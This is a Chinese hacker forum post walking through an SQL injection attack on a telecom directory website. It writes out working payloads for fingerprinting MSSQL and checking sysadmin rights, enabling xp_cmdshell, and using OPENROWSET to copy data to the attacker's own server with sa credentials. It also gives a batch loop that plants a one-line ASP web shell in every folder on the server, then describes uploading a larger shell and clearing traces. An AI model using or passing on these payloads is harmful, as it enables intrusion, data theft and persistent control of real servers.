MSSQL2005注入攻击
电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!兰州电信 号码百事通的网站 居然是用IIS ASP!呵呵!ASP估计脚本小子都玩得很熟悉了!-_- 而且ASP不采用FSO生成静态页面技术!呵呵~其实注入点并不是那么好找的!毕竟是电信的大网站!测试了好多个点都失败,我个人比较喜欢找那些片偏僻的url连接!那些80%的程序员都会疏忽~! OK来个经典 and 0=0and 0=1 返回不一样的结果!看来是数字输入的了!
不说太多~ 再看看是什么数据库 跟ASP结合 80% 都是MSSQL了!不过也有例外的~呵呵例如第2代身份证验证的网站 我记得有好几个是采用ASP/ASPX ORACLE 的!题外话就不多说了!来点直接的!<br />
and exists(select @@version)-- 返回正常哦~ 呵呵看来不会是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL<br />
那再来看看SYBASE 没有IS_SRVROLEMEMBER函数的!只有MS的才会有!而SYBASE判断权限就只有用show_role<br />
and 1=(select IS_SRVROLEMEMBER('sysadmin'))--喔? 返回正常哦 , 真大意啊~是SA权限!<br />
OK那么 就来个我的最爱 OPENROWSET<br />
先建一个表 <br />
create table c(dir ntext,num int,f int)--<br />
然后<br />
insert c execute master..xp_dirtree 'c:\',1,1--<br />
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')<br />
select * from c--把远程的表导到我自己机器上的MSSQL<br />
发现报告错误<br />
不允许OPENROWSET ~~ 奇怪?? 难道是MSSQL2005?权限问题?靠!那就开呗!幸好是SA权限<br />
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--开始分布式事务<br />
现在来真的了!不过还是有我最担心的~ 就是WEB跟DATABASE是分离的!这样搞起来就郁闷了!OK!<br />
既然是SA 那就把他的CMDSHELL都开了吧~<br />
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--<br />
这样就可以开启CMDSHELL 但是还没有添加扩展存储过程<br />
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--<br />
其实没有什么必要的~只是我为了方便防火墙!<br />
再来执行 exec master..xp_cmdshell 'ping 自己IP' 防火墙检测到有对方IP ping自己了呵呵!然后再ping他的WEBSITE<br />
看来是同一个IP哦~ 哈哈!那就爽了!那我就直接在他本地写一个bat吧!<br />
随便找个地方用xp_cmdshell写了个bat 内容为<br />
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v<br />
然后用他的xp_cmdshell执行 OK<br />
在C盘下面所有文件夹都有这个1.asp了~ 呵呵 如此类推<br />
把其他盘也感染.... 5分钟过后!~ 他的所有盘 所有文件夹都有这个 1.asp的一句话~ 哈哈!来到www.lanzhouXXXXX.com
在他的web上面传个大马子~KO~~... 记得收拾残局!把之前的垃圾清除~呵呵
<br />
頁:
[1]